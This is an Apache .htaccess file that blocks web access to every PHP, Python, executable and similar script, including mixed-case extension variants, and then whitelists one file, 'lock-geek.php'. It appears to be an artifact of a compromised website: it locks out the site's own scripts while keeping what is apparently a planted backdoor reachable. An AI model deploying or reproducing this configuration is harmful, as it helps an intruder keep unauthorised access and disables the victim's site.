<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|PHP7|suspected|shtml|phar|php7|php5)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "^(lock-geek.php)$">
Order Allow,Deny
Allow from all
</FilesMatch>
